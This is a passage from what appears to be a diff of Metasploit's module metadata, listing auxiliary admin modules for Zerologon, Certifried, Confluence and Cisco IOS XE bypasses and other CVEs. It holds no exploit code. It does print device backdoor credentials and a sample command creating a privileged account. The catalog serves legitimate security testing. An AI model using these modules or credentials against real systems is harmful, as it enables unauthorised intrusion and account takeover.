Failure\n to do so can result in service instability.", - "references": [ - "CVE-2020-1472", - "URL-https://www.secura.com/blog/zero-logon", - "URL-https://github.com/SecuraBV/CVE-2020-1472/blob/master/zerologon_tester.py", - "URL-https://github.com/dirkjanm/CVE-2020-1472/blob/master/restorepassword.py" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2022-08-03 14:27:30 +0000", - "path": "/modules/auxiliary/admin/dcerpc/cve_2020_1472_zerologon.rb", - "is_install_path": true, - "ref_name": "admin/dcerpc/cve_2020_1472_zerologon", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "Zerologon" - ], - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [ - "config-changes", - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "REMOVE", - "description": "Remove the machine account password" - }, - { - "name": "RESTORE", - "description": "Restore the machine account password" - } - ] - }, - "auxiliary_admin/dcerpc/cve_2022_26923_certifried": { - "name": "Active Directory Certificate Services (ADCS) privilege escalation (Certifried)", - "fullname": "auxiliary/admin/dcerpc/cve_2022_26923_certifried", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Oliver Lyak", - "CravateRouge", - "Erik Wynter", - "Christophe De La Fuente" - ], - "description": "This module exploits a privilege escalation vulnerability in Active\n Directory Certificate Services (ADCS) to generate a valid certificate\n impersonating the Domain Controller (DC) computer account. This\n certificate is then used to authenticate to the target as the DC\n account using PKINIT preauthentication mechanism. 
The module will get\n and cache the Ticket-Granting-Ticket (TGT) for this account along\n with its NTLM hash. Finally, it requests a TGS impersonating a\n privileged user (Administrator by default). This TGS can then be used\n by other modules or external tools.", - "references": [ - "URL-https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4", - "URL-https://cravaterouge.github.io/ad/privesc/2022/05/11/bloodyad-and-CVE-2022-26923.html", - "CVE-2022-26923" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2025-03-21 10:30:20 +0000", - "path": "/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb", - "is_install_path": true, - "ref_name": "admin/dcerpc/cve_2022_26923_certifried", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "AKA": [ - "Certifried" - ], - "Reliability": [], - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "AUTHENTICATE", - "description": "Same as REQUEST_CERT but also authenticate" - }, - { - "name": "PRIVESC", - "description": "Full privilege escalation attack" - }, - { - "name": "REQUEST_CERT", - "description": "Request a certificate with DNS host name matching the DC" - } - ] - }, - "auxiliary_admin/dcerpc/icpr_cert": { - "name": "ICPR Certificate Management", - "fullname": "auxiliary/admin/dcerpc/icpr_cert", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Will Schroeder", - "Lee Christensen", - "Oliver Lyak", - "Spencer McIntyre" - ], - "description": "Request certificates via MS-ICPR (Active Directory Certificate Services). 
Depending on the certificate\n template's configuration the resulting certificate can be used for various operations such as authentication.\n PFX certificate files that are saved are encrypted with a blank password.\n\n This module is capable of exploiting ESC1, ESC2, ESC3, ESC13 and ESC15.", - "references": [ - "URL-https://github.com/GhostPack/Certify", - "URL-https://github.com/ly4k/Certipy" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2025-03-21 10:30:20 +0000", - "path": "/modules/auxiliary/admin/dcerpc/icpr_cert.rb", - "is_install_path": true, - "ref_name": "admin/dcerpc/icpr_cert", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [], - "Stability": [], - "SideEffects": [ - "ioc-in-logs" - ], - "AKA": [ - "Certifry", - "Certipy" - ] - }, - "session_types": [ - "smb" - ], - "needs_cleanup": false, - "actions": [ - { - "name": "REQUEST_CERT", - "description": "Request a certificate" - } - ] - }, - "auxiliary_admin/dcerpc/samr_account": { - "name": "SAMR Account Management", - "fullname": "auxiliary/admin/dcerpc/samr_account", - "aliases": [ - "auxiliary/admin/dcerpc/samr_computer" - ], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "JaGoTu", - "Spencer McIntyre", - "smashery" - ], - "description": "Add, lookup and delete user / machine accounts via MS-SAMR. By default\n standard active directory users can add up to 10 new computers to the\n domain (MachineAccountQuota). 
Administrative privileges however are required\n to delete the created accounts, or to create/delete user accounts.", - "references": [ - "URL-https://github.com/SecureAuthCorp/impacket/blob/master/examples/addcomputer.py" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2024-12-16 14:55:10 +0000", - "path": "/modules/auxiliary/admin/dcerpc/samr_account.rb", - "is_install_path": true, - "ref_name": "admin/dcerpc/samr_account", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [], - "Stability": [], - "SideEffects": [ - "ioc-in-logs" - ], - "AKA": [ - "samr_computer", - "samr_user" - ] - }, - "session_types": [ - "smb" - ], - "needs_cleanup": false, - "actions": [ - { - "name": "ADD_COMPUTER", - "description": "Add a computer account" - }, - { - "name": "ADD_USER", - "description": "Add a user account" - }, - { - "name": "DELETE_ACCOUNT", - "description": "Delete a computer or user account" - }, - { - "name": "LOOKUP_ACCOUNT", - "description": "Lookup a computer or user account" - } - ] - }, - "auxiliary_admin/dns/dyn_dns_update": { - "name": "DNS Server Dynamic Update Record Injection", - "fullname": "auxiliary/admin/dns/dyn_dns_update", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "King Sabri ", - "Brent Cook " - ], - "description": "This module allows adding and/or deleting a record to\n any remote DNS server that allows unrestricted dynamic updates.", - "references": [ - "URL-https://www.tenable.com/plugins/nessus/35372", - "URL-https://github.com/KINGSABRI/CVE-in-Ruby/tree/master/NONE-CVE/DNSInject", - "URL-https://www.christophertruncer.com/dns-modification-dnsinject-nessus-plugin-35372/", - "URL-https://github.com/ChrisTruncer/PenTestScripts/blob/master/HostScripts/DNSInject.py" - ], - "platform": "", - "arch": 
"", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/admin/dns/dyn_dns_update.rb", - "is_install_path": true, - "ref_name": "admin/dns/dyn_dns_update", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "ADD", - "description": "Add a new record. Fail if it already exists." - }, - { - "name": "DELETE", - "description": "Delete an existing record." - }, - { - "name": "UPDATE", - "description": "Add or update a record. (default)" - } - ] - }, - "auxiliary_admin/edirectory/edirectory_dhost_cookie": { - "name": "Novell eDirectory DHOST Predictable Session Cookie", - "fullname": "auxiliary/admin/edirectory/edirectory_dhost_cookie", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module is able to predict the next session cookie value issued\n by the DHOST web service of Novell eDirectory 8.8.5. 
An attacker can run\n this module, wait until the real administrator logs in, then specify the\n predicted cookie value to hijack their session.", - "references": [ - "CVE-2009-4655", - "OSVDB-60035" - ], - "platform": "", - "arch": "", - "rport": 8030, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2018-07-08 19:00:11 +0000", - "path": "/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb", - "is_install_path": true, - "ref_name": "admin/edirectory/edirectory_dhost_cookie", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/edirectory/edirectory_edirutil": { - "name": "Novell eDirectory eMBox Unauthenticated File Access", - "fullname": "auxiliary/admin/edirectory/edirectory_edirutil", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Nicob", - "MC ", - "sinn3r " - ], - "description": "This module will access Novell eDirectory's eMBox service and can run the\n following actions via the SOAP interface: GET_DN, READ_LOGS, LIST_SERVICES,\n STOP_SERVICE, START_SERVICE, SET_LOGFILE.", - "references": [ - "CVE-2008-0926", - "BID-28441", - "OSVDB-43690" - ], - "platform": "", - "arch": "", - "rport": 8028, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb", - "is_install_path": true, - "ref_name": "admin/edirectory/edirectory_edirutil", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "GET_DN", - "description": "Get DN" - }, - { - "name": "LIST_SERVICES", - "description": "List services" - }, - { - "name": 
"READ_LOGS", - "description": "Read all the log files" - }, - { - "name": "SET_LOGFILE", - "description": "Read Log File" - }, - { - "name": "START_SERVICE", - "description": "Start a service" - }, - { - "name": "STOP_SERVICE", - "description": "Stop a service" - } - ] - }, - "auxiliary_admin/emc/alphastor_devicemanager_exec": { - "name": "EMC AlphaStor Device Manager Arbitrary Command Execution", - "fullname": "auxiliary/admin/emc/alphastor_devicemanager_exec", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-05-27", - "type": "auxiliary", - "author": [ - "MC " - ], - "description": "EMC AlphaStor Device Manager is prone to a remote command-injection vulnerability\n because the application fails to properly sanitize user-supplied input.", - "references": [ - "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=703", - "OSVDB-45715", - "CVE-2008-2157", - "BID-29398" - ], - "platform": "", - "arch": "", - "rport": 3000, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb", - "is_install_path": true, - "ref_name": "admin/emc/alphastor_devicemanager_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/emc/alphastor_librarymanager_exec": { - "name": "EMC AlphaStor Library Manager Arbitrary Command Execution", - "fullname": "auxiliary/admin/emc/alphastor_librarymanager_exec", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-05-27", - "type": "auxiliary", - "author": [ - "MC " - ], - "description": "EMC AlphaStor Library Manager is prone to a remote command-injection vulnerability\n because the application fails to properly sanitize user-supplied input.", - "references": [ - "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=703", - 
"CVE-2008-2157", - "OSVDB-45715", - "BID-29398" - ], - "platform": "", - "arch": "", - "rport": 3500, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb", - "is_install_path": true, - "ref_name": "admin/emc/alphastor_librarymanager_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/firetv/firetv_youtube": { - "name": "Amazon Fire TV YouTube Remote Control", - "fullname": "auxiliary/admin/firetv/firetv_youtube", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "wvu " - ], - "description": "This module acts as a simple remote control for the Amazon Fire TV's\n YouTube app.\n\n Tested on the Amazon Fire TV Stick.", - "references": [ - "URL-http://http://web.archive.org/web/20210301101536/http://www.amazon.com/dp/B00CX5P8FC/?_encoding=UTF8", - "URL-https://www.amazon.com/dp/B00GDQ0RMG/ref=fs_ftvs" - ], - "platform": "", - "arch": "", - "rport": 8008, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2025-02-28 11:29:59 +0000", - "path": "/modules/auxiliary/admin/firetv/firetv_youtube.rb", - "is_install_path": true, - "ref_name": "admin/firetv/firetv_youtube", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Play", - "description": "Play video" - }, - { - "name": "Stop", - "description": "Stop video" - } - ] - }, - "auxiliary_admin/hp/hp_data_protector_cmd": { - "name": "HP Data Protector 6.1 EXEC_CMD Command Execution", - "fullname": "auxiliary/admin/hp/hp_data_protector_cmd", - "aliases": [], - "rank": 
300, - "disclosure_date": "2011-02-07", - "type": "auxiliary", - "author": [ - "ch0ks", - "c4an", - "wireghoul", - "sinn3r " - ], - "description": "This module exploits HP Data Protector's omniinet process, specifically\n against a Windows setup.\n\n When an EXEC_CMD packet is sent, omniinet.exe will attempt to look\n for that user-supplied filename with kernel32!FindFirstFileW(). If the file\n is found, the process will then go ahead execute it with CreateProcess()\n under a new thread. If the filename isn't found, FindFirstFileW() will throw\n an error (0x03), and then bails early without triggering CreateProcess().\n\n Because of these behaviors, if you try to supply an argument, FindFirstFileW()\n will look at that as part of the filename, and then bail.\n\n Please note that when you specify the 'CMD' option, the base path begins\n under C:\\.", - "references": [ - "CVE-2011-0923", - "OSVDB-72526", - "ZDI-11-055", - "URL-https://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux/" - ], - "platform": "", - "arch": "", - "rport": 5555, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb", - "is_install_path": true, - "ref_name": "admin/hp/hp_data_protector_cmd", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/hp/hp_ilo_create_admin_account": { - "name": "HP iLO 4 1.00-2.50 Authentication Bypass Administrator Account Creation", - "fullname": "auxiliary/admin/hp/hp_ilo_create_admin_account", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-08-24", - "type": "auxiliary", - "author": [ - "Fabien Perigaud " - ], - "description": "This module exploits an authentication bypass in HP iLO 4 1.00 to 2.50, triggered by a buffer\n overflow in the Connection HTTP header handling by the web 
server.\n Exploiting this vulnerability gives full access to the REST API, allowing arbitrary\n accounts creation.", - "references": [ - "CVE-2017-12542", - "BID-100467", - "URL-https://support.hpe.com/hpesc/public/docDisplay?docId=emr_na-hpesbhf03769en_us", - "URL-https://www.synacktiv.com/en/publications/hp-ilo-talk-at-recon-brx-2018.html" - ], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/admin/hp/hp_ilo_create_admin_account.rb", - "is_install_path": true, - "ref_name": "admin/hp/hp_ilo_create_admin_account", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/hp/hp_imc_som_create_account": { - "name": "HP Intelligent Management SOM Account Creation", - "fullname": "auxiliary/admin/hp/hp_imc_som_create_account", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-10-08", - "type": "auxiliary", - "author": [ - "rgod ", - "juan vazquez " - ], - "description": "This module exploits a lack of authentication and access control in HP Intelligent\n Management, specifically in the AccountService RpcServiceServlet from the SOM component,\n in order to create a SOM account with Account Management permissions. 
This module has\n been tested successfully on HP Intelligent Management Center 5.2 E0401 and 5.1 E202 with\n SOM 5.2 E0401 and SOM 5.1 E0201 over Windows 2003 SP2.", - "references": [ - "CVE-2013-4824", - "OSVDB-98249", - "BID-62902", - "ZDI-13-240", - "URL-https://support.hpe.com/hpesc/public/docDisplay?docId=emr_na-c03943547" - ], - "platform": "", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb", - "is_install_path": true, - "ref_name": "admin/hp/hp_imc_som_create_account", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/allegro_rompager_auth_bypass": { - "name": "Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Authentication Bypass", - "fullname": "auxiliary/admin/http/allegro_rompager_auth_bypass", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-12-17", - "type": "auxiliary", - "author": [ - "Jon Hart ", - "Jan Trencansky ", - "Lior Oppenheim" - ], - "description": "This module exploits HTTP servers that appear to be vulnerable to the\n 'Misfortune Cookie' vulnerability which affects Allegro Software\n Rompager versions before 4.34 and can allow attackers to authenticate\n to the HTTP service as an administrator without providing valid\n credentials.", - "references": [ - "CVE-2014-9222", - "URL-https://web.archive.org/web/20191006135858/http://mis.fortunecook.ie/", - "URL-https://web.archive.org/web/20190207102911/http://mis.fortunecook.ie/misfortune-cookie-suspected-vulnerable.pdf", - "URL-https://web.archive.org/web/20190623150837/http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf" - ], - "platform": "", - "arch": 
"", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.rb", - "is_install_path": true, - "ref_name": "admin/http/allegro_rompager_auth_bypass", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/arris_motorola_surfboard_backdoor_xss": { - "name": "Arris / Motorola Surfboard SBG6580 Web Interface Takeover", - "fullname": "auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-04-08", - "type": "auxiliary", - "author": [ - "joev " - ], - "description": "The web interface for the Arris / Motorola Surfboard SBG6580 has\n several vulnerabilities that, when combined, allow an arbitrary website to take\n control of the modem, even if the user is not currently logged in. The attacker\n must successfully know, or guess, the target's internal gateway IP address.\n This is usually a default value of 192.168.0.1.\n\n First, a hardcoded backdoor account was discovered in the source code\n of one device with the credentials \"technician/yZgO8Bvj\". Due to lack of CSRF\n in the device's login form, these credentials - along with the default\n \"admin/motorola\" - can be sent to the device by an arbitrary website, thus\n inadvertently logging the user into the router.\n\n Once successfully logged in, a persistent XSS vulnerability is\n exploited in the firewall configuration page. 
This allows injection of\n Javascript that can perform any available action in the router interface.\n\n The following firmware versions have been tested as vulnerable:\n\n SBG6580-6.5.2.0-GA-06-077-NOSH, and\n SBG6580-8.6.1.0-GA-04-098-NOSH", - "references": [ - "CVE-2015-0964", - "CVE-2015-0965", - "CVE-2015-0966", - "URL-http://web.archive.org/web/20220810083803/https://www.rapid7.com/blog/post/2015/06/05/r7-2015-01-csrf-backdoor-and-persistent-xss-on-arris-motorola-cable-modems/" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb", - "is_install_path": true, - "ref_name": "admin/http/arris_motorola_surfboard_backdoor_xss", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "WebServer", - "description": "Serve exploit via web server" - } - ] - }, - "auxiliary_admin/http/atlassian_confluence_auth_bypass": { - "name": "Atlassian Confluence Data Center and Server Authentication Bypass via Broken Access Control", - "fullname": "auxiliary/admin/http/atlassian_confluence_auth_bypass", - "aliases": [], - "rank": 300, - "disclosure_date": "2023-10-04", - "type": "auxiliary", - "author": [ - "Unknown", - "Emir Polat" - ], - "description": "This module exploits a broken access control vulnerability in Atlassian Confluence servers leading to an authentication bypass.\n A specially crafted request can be create new admin account without authentication on the target Atlassian server.", - "references": [ - "CVE-2023-22515", - "URL-https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html", - "URL-https://nvd.nist.gov/vuln/detail/CVE-2023-22515", - 
"URL-https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis" - ], - "platform": "", - "arch": "", - "rport": 8090, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-10-19 17:11:03 +0000", - "path": "/modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb", - "is_install_path": true, - "ref_name": "admin/http/atlassian_confluence_auth_bypass", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "config-changes" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/axigen_file_access": { - "name": "Axigen Arbitrary File Read and Delete", - "fullname": "auxiliary/admin/http/axigen_file_access", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-10-31", - "type": "auxiliary", - "author": [ - "Zhao Liang", - "juan vazquez " - ], - "description": "This module exploits a directory traversal vulnerability in the WebAdmin\n interface of Axigen, which allows an authenticated user to read and delete\n arbitrary files with SYSTEM privileges. The vulnerability is known to work on\n Windows platforms. 
This module has been tested successfully on Axigen 8.10 over\n Windows 2003 SP2.", - "references": [ - "US-CERT-VU-586556", - "CVE-2012-4940", - "OSVDB-86802" - ], - "platform": "", - "arch": "", - "rport": 9000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/axigen_file_access.rb", - "is_install_path": true, - "ref_name": "admin/http/axigen_file_access", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Delete", - "description": "Delete remote file" - }, - { - "name": "Read", - "description": "Read remote file" - } - ] - }, - "auxiliary_admin/http/cfme_manageiq_evm_pass_reset": { - "name": "Red Hat CloudForms Management Engine 5.1 miq_policy/explorer SQL Injection", - "fullname": "auxiliary/admin/http/cfme_manageiq_evm_pass_reset", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-11-12", - "type": "auxiliary", - "author": [ - "Ramon de C Valle " - ], - "description": "This module exploits a SQL injection vulnerability in the \"explorer\"\n action of \"miq_policy\" controller of the Red Hat CloudForms Management\n Engine 5.1 (ManageIQ Enterprise Virtualization Manager 5.0 and earlier) by\n changing the password of the target account to the specified password.", - "references": [ - "CVE-2013-2050", - "CWE-89", - "URL-https://bugzilla.redhat.com/show_bug.cgi?id=959062" - ], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb", - "is_install_path": true, - "ref_name": 
"admin/http/cfme_manageiq_evm_pass_reset", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/cisco_7937g_ssh_privesc": { - "name": "Cisco 7937G SSH Privilege Escalation", - "fullname": "auxiliary/admin/http/cisco_7937g_ssh_privesc", - "aliases": [], - "rank": 300, - "disclosure_date": "2020-06-02", - "type": "auxiliary", - "author": [ - "Cody Martin" - ], - "description": "This module exploits a feature that should not be available \n\tvia the web interface. An unauthenticated user may change \n\tthe credentials for SSH access to any username and password \n\tcombination desired, giving access to administrative \n\tfunctions through an SSH connection.", - "references": [ - "URL-https://web.archive.org/web/20200921054955/https://www.blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/", - "CVE-2020-16137" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/admin/http/cisco_7937g_ssh_privesc.py", - "is_install_path": true, - "ref_name": "admin/http/cisco_7937g_ssh_privesc", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/cisco_ios_xe_cli_exec_cve_2023_20198": { - "name": "Cisco IOX XE unauthenticated Command Line Interface (CLI) execution", - "fullname": "auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198", - "aliases": [], - "rank": 300, - "disclosure_date": "2023-10-16", - "type": "auxiliary", - "author": [ - "sfewer-r7" - ], - "description": "This module leverages CVE-2023-20198 against vulnerable instances of Cisco IOS XE devices which have the\n Web UI exposed. 
An attacker can execute arbitrary CLI commands with privilege level 15.\n\n You must specify the IOS command mode to execute a CLI command in. Valid modes are `user`, `privileged`, and\n `global`. To run a command in \"Privileged\" mode, set the `CMD` option to the command you want to run,\n e.g. `show version` and set the `MODE` to `privileged`. To run a command in \"Global Configuration\" mode, set\n the `CMD` option to the command you want to run, e.g. `username hax0r privilege 15 password hax0r` and set\n the `MODE` to `global`.\n\n The vulnerable IOS XE versions are:\n 16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4,\n 16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2,\n 16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4,\n 16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9,\n 16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b,\n 16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b,\n 16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a,\n 16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1,\n 16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g,\n 16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s,\n 16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s,\n 16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5,\n 16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10,\n 17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v,\n 17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z,\n 17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7,\n 17.3.8, 
